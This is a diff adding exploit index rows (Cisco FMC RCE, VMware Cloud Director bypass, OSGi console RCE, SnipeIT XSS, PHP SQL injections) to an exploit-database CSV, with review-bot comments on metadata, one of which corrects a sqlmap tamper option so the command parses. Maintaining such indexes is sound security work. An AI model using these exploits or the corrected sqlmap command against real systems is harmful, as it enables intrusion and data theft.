a/files_exploits.csv b/files_exploits.csv index ffa32025d..c1a2e0103 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
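Review bot: The sqlmap command has `tamper=between,randomcase` without the leading `--`, so sqlmap will not parse it as an option; it should read `--tamper=between,randomcase`. The date `2023-26-12` is not a valid date and presumably means `2023-12-26`. The description's "exploit latest vulnerabilities in the underlying database" is vague; "read or modify data in the back-end database (current database `loginsystem`)" matches what the sqlmap output actually shows. The `--proxy="http://127.0.0.1:8080"` in the command only works with Burp listening; note that it is optional.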
@@ -4165,6 +4165,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-16,2013-12-16,0,CVE-2013-6976;OSVDB-101097,,,,,
 30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware,,2013-12-22,2013-12-22,0,CVE-2013-6976;OSVDB-101097,,,,,
 46263,exploits/hardware/webapps/46263.txt,"Cisco Firepower Management Center 6.2.2.2 / 6.2.3 - Cross-Site Scripting",2019-01-28,"Bhushan B. Patil",webapps,hardware,443,2019-01-28,2019-01-30,1,CVE-2019-1642,"Cross-Site Scripting (XSS)",,,,
+51881,exploits/hardware/webapps/51881.py,"Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE",2024-03-12,"Abdualhadi khalifa",webapps,hardware,,2024-03-12,2024-03-12,0,,,,,,
 25292,exploits/hardware/webapps/25292.txt,"Cisco Linksys E4200 - Multiple Vulnerabilities",2013-05-07,sqlhacker,webapps,hardware,,2013-05-07,2016-10-27,0,CVE-2013-2684;CVE-2013-2683;CVE-2013-2682;CVE-2013-2681;CVE-2013-2680;CVE-2013-2679;CVE-2013-2678;OSVDB-93065;OSVDB-93064;OSVDB-93063;OSVDB-93062;OSVDB-93061;OSVDB-93060;OSVDB-93059;OSVDB-89911,,,,,
 16252,exploits/hardware/webapps/16252.html,"Cisco Linksys WAG120N - Cross-Site Request Forgery",2011-02-26,"Khashayar Fereidani",webapps,hardware,,2011-02-26,2011-02-26,0,OSVDB-71032,,,,,
 18503,exploits/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS - Cross-Site Request Forgery (Change Admin Password)",2012-02-21,"Ivano Binetti",webapps,hardware,,2012-02-21,2012-02-21,0,OSVDB-80809,,,,,
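Review bot: The new `51881` row leaves the codes column empty although `51881.py` in this commit names `CVE-2023-20048` in its header; sibling rows such as `46263` carry their CVE in that column, so it should be `CVE-2023-20048`. The description `< 6.6.7.1 - Authenticated RCE` also disagrees with the script's own version header and vulnerability check, which treat 6.2.3.18, 6.4.0.16 and 6.6.7.1 as the affected releases; reconcile the two against the advisory before indexing.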
@@ -11528,6 +11529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44000,exploits/multiple/remote/44000.txt,"Vitek - Remote Command Execution / Information Disclosure (PoC)",2017-12-22,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/3220fa6a56c61cf53652e98356f94e0c6a833cd3/Vitek_RCE_and_information_disclosure.txt
 44001,exploits/multiple/remote/44001.txt,"Vivotek IP Cameras - Remote Stack Overflow (PoC)",2017-12-12,bashis,remote,multiple,,2018-02-07,2018-02-07,0,,,,,,https://github.com/mcw0/PoC/blob/96892a5e7d513298b3181265055d437753dbaa55/Vivotek%20IP%20Cameras%20-%20Remote%20Stack%20Overflow.txt
 15617,exploits/multiple/remote/15617.txt,"VMware 2 Web Server - Directory Traversal",2010-11-25,clshack,remote,multiple,,2010-11-30,2013-12-08,1,OSVDB-69586,,,http://www.exploit-db.com/screenshots/idlt16000/vmware-traversal.png,,
+51882,exploits/multiple/remote/51882.py,"VMware Cloud Director 10.5 - Bypass identity verification",2024-03-12,"Abdualhadi khalifa",remote,multiple,,2024-03-12,2024-03-12,0,,,,,,
 28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",remote,multiple,,2006-07-31,2013-09-15,1,CVE-2006-2481;OSVDB-27695,,,,,https://www.securityfocus.com/bid/19249/info
 28962,exploits/multiple/remote/28962.rb,"VMware Hyperic HQ Groovy Script-Console - Java Execution (Metasploit)",2013-10-14,Metasploit,remote,multiple,,2013-10-14,2013-10-14,1,OSVDB-98804;CVE-2013-6366,"Metasploit Framework (MSF)",,,,
 33310,exploits/multiple/remote/33310.nse,"VMware Server 2.0.1 / ESXi Server 3.5 - Directory Traversal",2009-10-27,"Justin Morehouse",remote,multiple,,2009-10-27,2014-05-12,1,CVE-2009-3733;OSVDB-59440,,,,,https://www.securityfocus.com/bid/36842/info
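Review bot: The codes column of the new `51882` row is empty while `51882.py` cites `CVE-2023-34060`; the neighbouring rows `28312`, `28962` and `33310` record their CVE there, so it should be `CVE-2023-34060`. The description "Bypass identity verification" would be more useful in the index's usual form, e.g. `Authentication Bypass`, and the port column could carry one of the ports the script probes (22 or 5480) as rows like `46263` do.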
@@ -12112,6 +12114,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50551,exploits/multiple/webapps/50551.txt,"orangescrum 1.8.0 - Privilege escalation (Authenticated)",2021-11-29,"Hubert Wojciechowski",webapps,multiple,,2021-11-29,2021-11-29,0,,,,,http://www.exploit-db.comos-php72-setup.zip,
 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
 46517,exploits/multiple/webapps/46517.txt,"OrientDB 3.0.17 GA Community Edition - Cross-Site Request Forgery / Cross-Site Scripting",2019-03-08,"Ozer Goker",webapps,multiple,,2019-03-08,2019-03-08,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comorientdb-3.0.17.zip,
+51879,exploits/multiple/webapps/51879.py,"OSGi v3.7.2 (and below) Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
+51878,exploits/multiple/webapps/51878.py,"OSGi v3.8-3.18 Console - RCE",2024-03-12,"Andrzej Olchawa_ Milenko Starcik",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
 24922,exploits/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent Cross-Site Scripting",2013-04-08,"Luigi Vezzoso",webapps,multiple,,2013-04-08,2013-04-08,1,CVE-2013-2637;OSVDB-92086,,,,,
 32162,exploits/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,webapps,multiple,80,2014-03-10,2016-10-10,1,CVE-2014-2044;OSVDB-104082,,,,,https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2044/
 37058,exploits/multiple/webapps/37058.txt,"OYO File Manager 1.1 (iOS / Android) - Multiple Vulnerabilities",2015-05-18,Vulnerability-Lab,webapps,multiple,8080,2015-05-18,2015-05-18,0,OSVDB-122315;OSVDB-122311;OSVDB-122310,,,,,https://www.vulnerability-lab.com/get_content.php?id=1494
@@ -12210,6 +12214,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48580,exploits/multiple/webapps/48580.py,"SmarterMail 16 - Arbitrary File Upload",2020-06-12,vvhack.org,webapps,multiple,,2020-06-12,2020-06-12,0,,,,,,
 49528,exploits/multiple/webapps/49528.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console WebSocket XSS",2021-02-08,LiquidWorm,webapps,multiple,,2021-02-08,2021-02-08,0,,,,,,
 49829,exploits/multiple/webapps/49829.js,"SnipCommand 0.1.0 - Persistent Cross-Site Scripting",2021-05-05,TaurusOmar,webapps,multiple,,2021-05-05,2021-10-29,0,,,,,,
+51883,exploits/multiple/webapps/51883.txt,"SnipeIT 6.2.1 - Stored Cross Site Scripting",2024-03-12,"Shahzaib Ali Khan",webapps,multiple,,2024-03-12,2024-03-12,0,,,,,,
 43445,exploits/multiple/webapps/43445.txt,"Snitz Forums 2000 < 3.4.0.3 - Multiple Vulnerabilities",2003-06-16,"GulfTech Security",webapps,multiple,,2018-01-05,2018-01-05,0,GTSA-00010,,,,,http://gulftech.org/advisories/Snitz%20Forums%202000%20Multiple%20Vulnerabilities/10
 48713,exploits/multiple/webapps/48713.txt,"Socket.io-file 2.0.31 - Arbitrary File Upload",2020-07-26,Cr0wTom,webapps,multiple,,2020-07-26,2020-07-26,0,,,,,,
 49986,exploits/multiple/webapps/49986.txt,"Solar-Log 500 2.8.2 - Incorrect Access Control",2021-06-11,Luca.Chiou,webapps,multiple,,2021-06-11,2021-06-11,0,,,,,,
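Review bot: The author field on both new OSGi rows, `"Andrzej Olchawa_ Milenko Starcik"`, presumably names two people, and the underscore looks like a substituted separator rather than part of a name; the field is already double-quoted, so a comma or ` / ` can be used safely, as other multi-word author values in this file (`"Jeroen - IT Nerdbox"`) already are. Both rows also leave `codes` and `tags` empty for a console remote-code-execution issue; if the finding has an advisory reference it belongs in `codes`, and the `port` column should be filled if the console listens on a fixed port. The split into `v3.7.2 (and below)` and `v3.8-3.18` is fine, but a reader has no way to tell from the index which of the two files to pick without an affected-version note, so consider stating the distinguishing point in the descriptions.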
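Review bot: The new 51883 row leaves the `tags` column empty although its description is `Stored Cross Site Scripting`; other XSS entries in this file, such as 46263 and 46517, carry `"Cross-Site Scripting (XSS)"` in that column, and it is presumably what the site's vulnerability-type filters key on, so the tag should be added. The title also drops the hyphen the rest of the index uses (`Cross-Site Scripting`); `"SnipeIT 6.2.1 - Stored Cross-Site Scripting"` would match house style and keyword searches. Recording whether the injection requires an authenticated account, as 50551 does with `(Authenticated)`, would also help readers triage it.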
@@ -15830,6 +15835,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12500,exploits/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,webapps,php,,2010-05-03,,1,,,,,,
 21454,exploits/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,webapps,php,,2002-05-12,2012-09-22,1,OSVDB-86919,,,,,https://www.securityfocus.com/bid/4756/info
 51135,exploits/php/webapps/51135.txt,"ClicShopping v3.402 - Cross-Site Scripting (XSS)",2023-03-30,nu11secur1ty,webapps,php,,2023-03-30,2023-03-30,0,,,,,,
+51880,exploits/php/webapps/51880.txt,"Client Details System 1.0 - SQL Injection",2024-03-12,"Hamdi Sevben",webapps,php,,2024-03-12,2024-03-12,0,,,,,,
 41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php,,2017-02-09,2017-02-09,0,,,,,,
 48956,exploits/php/webapps/48956.txt,"Client Management System 1.0 - 'searchdata' SQL injection",2020-10-27,"Serkan Sancar",webapps,php,,2020-10-27,2020-10-27,0,,,,,,
 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,,2021-08-04,2021-08-04,0,,,,,,
@@ -19721,6 +19727,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34412,exploits/php/webapps/34412.txt,"Hulihan Applications BXR 0.6.8 - SQL Injection / HTML Injection",2010-08-05,"High-Tech Bridge SA",webapps,php,,2010-08-05,2014-08-26,1,CVE-2010-4963;OSVDB-67054,,,,,https://www.securityfocus.com/bid/42247/info
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System 0.1 - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,,2021-05-10,2021-05-10,0,,,,,,
 49847,exploits/php/webapps/49847.py,"Human Resource Information System 0.1 - Remote Code Execution (Unauthenticated)",2021-05-07,"Reza Afsahi",webapps,php,,2021-05-07,2021-05-07,0,,,,,,
+51877,exploits/php/webapps/51877.txt,"Human Resource Management System 1.0 - 'employeeid' SQL Injection",2024-03-12,Srikar,webapps,php,,2024-03-12,2024-03-12,0,,,,,,
 51125,exploits/php/webapps/51125.txt,"Human Resource Management System 1.0 - SQL Injection (unauthenticated)",2023-03-29,"Matthijs van der Vaart (eMVee)",webapps,php,,2023-03-29,2023-03-29,0,,,,,,
 51047,exploits/php/webapps/51047.txt,"Human Resources Management System v1.0 - Multiple SQLi",2023-03-25,"Abdulhakim Öner",webapps,php,,2023-03-25,2023-03-25,0,,,,,,
 9494,exploits/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,webapps,php,,2009-08-23,,1,,,,,,
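Review bot: The new 51877 row is the third SQL-injection entry for `Human Resource Management System 1.0` in this hunk, sitting next to 51125 (`SQL Injection (unauthenticated)`) and 51047 (`Multiple SQLi`), so whether the `employeeid` parameter is already covered by either of those files should be checked before a separate exploit is indexed. If it is genuinely distinct, stating the authentication requirement in the description, as 51125 and 49847 do with `(unauthenticated)` / `(Unauthenticated)`, would let readers tell the three apart. The `codes` column is empty on all three rows; if a CVE was ever assigned to this product's SQLi it should be recorded on the new row so the duplicates can later be reconciled by identifier.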